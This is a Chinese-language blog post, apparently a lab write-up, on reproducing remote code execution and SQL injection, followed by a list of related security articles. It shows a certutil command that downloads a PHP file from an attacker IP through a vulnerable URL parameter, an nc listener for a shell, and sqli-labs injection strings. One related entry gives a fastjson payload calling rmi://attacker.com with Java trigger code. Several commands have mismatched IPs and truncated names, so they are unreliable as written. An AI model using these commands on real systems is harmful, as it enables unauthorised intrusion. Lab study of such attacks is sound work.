值得复现的rce和sql

最新推荐文章于 2024-09-25 14:27:06 发布
最新推荐文章于 2024-09-25 14:27:06 发布
阅读量238 收藏
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gggghcvg/article/details/141116845
版权

漏洞利用
利用cmd命令远程下载文件 (1.txt不需要创建)

将2.php文件上传

certutil -urlcache -split -f http://192.168.123.150/1.txt 2.php
攻击机中访问:

 http://192.168.232.141/1.php?a=certutil -urlcache -split -f http://192.168.101.8/1.txt 2.ph


使用kali的nc监听3939端口

nc -lvvp 3939

浏览器访问2.php文件

监听成功,成功get shel

sqllabs 第12关

当我们输入1'和1时候页面没有反应

那么我们可以构造下面语句进行sql注入。

1" ) or 1=1 #判断是否存在sql注入。
1" ) union select 1,2#

gggghcvg
关注
飞企互联-FE企业运营管理平台 多处 SQL注入致RCE漏洞复现
0xSec
06-28 941
飞企互联-FE企业运营管理平台 checkGroupCode、efficientCodewidget39、ajax_codewidget39等接口存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
PbootCMS 前台RCE漏洞复现
0xSec
12-07 3521
PbootCMS v
复现RCESQL
m0_61635694的博客
08-12 244
当前的操作或请求类型是针对管理员,要执行的动作是remotelogin,即远程登录,指定了管理员目录的名称。将获得的args中+ 和 /分别替换为%2b和%2f。只需要ishtml=1 就可以绕过使得条件为真。进行反向加码解码,即可获得args。
RCEsql
sgg236的博客
08-11 345
RCE 指的是攻击者能够在远程系统上执行任意代码。这是一种非常严重的安全漏洞,因为它允许攻击者完全控制受影响的系统。造成 RCE 漏洞的原因通常包括以下几点:1. 输入验证不足:服务器端对用户输入的数据没有进行充分的验证和过滤,使得攻击者能够构造恶意的输入来执行任意代码。2. 不安全的函数调用:使用了一些存在安全风险的函数或方法,被攻击者利用来执行代码。3. 权限配置不当:系统权限设置不合理,导致攻击者能够获得执行代码的权限。
SqlRce注入相关漏洞复现
山月不问人间事
08-12 796
‌这些查询可以是SELECT、‌INSERT、‌UPDATE或DELETE等,‌它们将在数据库中按顺序处理,‌尽管它们是在单个函数调用中发送的。假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST['i_d']就是2。可在$_SERVER['REQUEST_URI']中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的$_REQUEST['i_d']却是1。参数是可选的,‌用于限制分割后的数组元素数量。
Nacos Derby从SQLRCE
好记性不如烂笔头
07-16 1542
derby路径下的函数如下,该方法主要用于Derby数据库的查询操作,确保只执行SELECT语句,并在必要时添加分页限制。如果当前存储模式不是 Derby 或者遇到异常,方法会返回相应的错误信息。在Java应用程序中使用JDBC API调用Derby的存储过程和函数会触发相应的函数执行。
thinkphp5 RCE漏洞复现
feng的博客
03-03 3481
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
sqlrce漏洞整理
yfy0308的博客
08-11 905
源代码进行了两次取值,第一次取值判断是否有非法字符,也就是第二个waf,第二次取值会覆盖第一次(在这里会产生问题),然后进行'&', '"', '<', '>', '(', ')'的过滤。传值pass=$_POST[123],按理来说,assert可以执行$_POST,但是用动态传递的方式失败,使用蚁剑连接失败,但是在前面加一个eval即可成功,即pass=eval($_POST[123])i_d=1&i_d=2 php会默认取第二个,两次取值函数都取第二个无害数据,我们的有害数据没进去。
用友NC pagesServlet SQL注入致RCE漏洞复现(XVE-2024-13067)
0xSec
06-03 950
用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
科讯校园一卡通管理系统 多处SQL注入致RCE漏洞复现
0xSec
07-24 2924
科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking、DataService.asmx等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科迅图书馆云平台 WebCloud.asmx SQL注入致RCE漏洞复现
0xSec
05-30 593
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
朗新天霁eHR GetFunc_code.asmx SQL注入致RCE漏洞复现
0xSec
07-04 1610
朗新天霁eHR GetFunc_code.asmx接口的GetMessage、GetShortMessage、GetToken、GetMessageNew等多个实例处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
SQL - 进阶语法(一)
qq_51222843的博客
09-21 651
关于SQL的进阶语法教程,包括简单合并数据库,修改数据库内容等操作
[OPEN SQL] SELECT语句
Hudas的博客
09-23 566
本文主要讲解OPEN SQL读取数据的SELECT语句相关知识点
Transact-SQL概述(SQL Server 2022)
brucexia的专栏
09-23 1311
Transact-SQL是Microsoft公司在关系数据库管理系统SQL Server中的SQL3标准的实现,是微软对SQL的扩展。在SQL Server中,所有与服务器实例的通信都是通过发送Transact-SQL语句到服务器来实现的。根据其完成的具体功能,可以将Transact-SQL语句分为四大类,分别为数据操作语句、数据定义语句、数据控制语句和一些附加的语言元素。
Postgresql特殊关键字
czjnoe的博客
09-25 292
表字段名称如果出现这些特殊关键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊关键字。
渗透测试工具 sqlmap 基础教程
最新发布
2301_77160226的博客
09-25 673
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
Python 课程18-SQLAlchemy
tim654654的博客
09-25 1132
SQLAlchemy ORM 中,表结构通过 Python 类表示。每个类代表数据库中的一张表,类的属性代表表中的列。定义模型类__tablename__ = 'users' # 表名SQLAlchemy 的func模块使得我们能够使用数据库中的聚合函数,如COUNTSUMMAX等。聚合查询# 查询用户的最大年龄# 计算特定条件下的总人数。
fastjson rce复现
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为而存在远程代码执行(RCE)漏洞。为了复现该漏洞,我们可以按照以下步骤进行操作: 第一步是选择一个适当的fastjson版本,建议使用较早的版本,因为新的版本通常会修复漏洞。将fastjson库添加到Java项目的依赖中。 第二步是创建一个恶意JSON字符串,该字符串中包含能够触发RCE漏洞的payload。例如,可以使用如下的JSON字符串: ``` { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://attacker.com:1099/Exploit", "autoCommit":true } ``` 在这个例子中,我们使用了`com.sun.rowset.JdbcRowSetImpl`类作为目标,其中连接地址指向攻击者控制的RMI服务器,用于向受害系统发送恶意代码。 第三步是编写Java代码,并将上一步创建的JSON字符串作为输入传递给fastjson的解析器。以下是一个简单的示例: ```java import com.alibaba.fastjson.JSON; public class FastjsonRce { public static void main(String[] args) { String maliciousJson = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.com:1099/Exploit\",\"autoCommit\":true}"; Object parsedObject = JSON.parse(maliciousJson); } } ``` 在这个示例中,我们使用`JSON.parse`方法将JSON字符串解析为一个对象。fastjson在解析时会实例化目标类,并调用其构造函数和setter方法,从而导致RCE漏洞的利用。 第四步是运行上述Java代码,并观察是否成功复现RCE漏洞。如果目标系统受到fastjson的漏洞影响,恶意代码会在解析过程中被执行,从而使攻击者可以远程控制该系统。 需要注意的是,复现fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值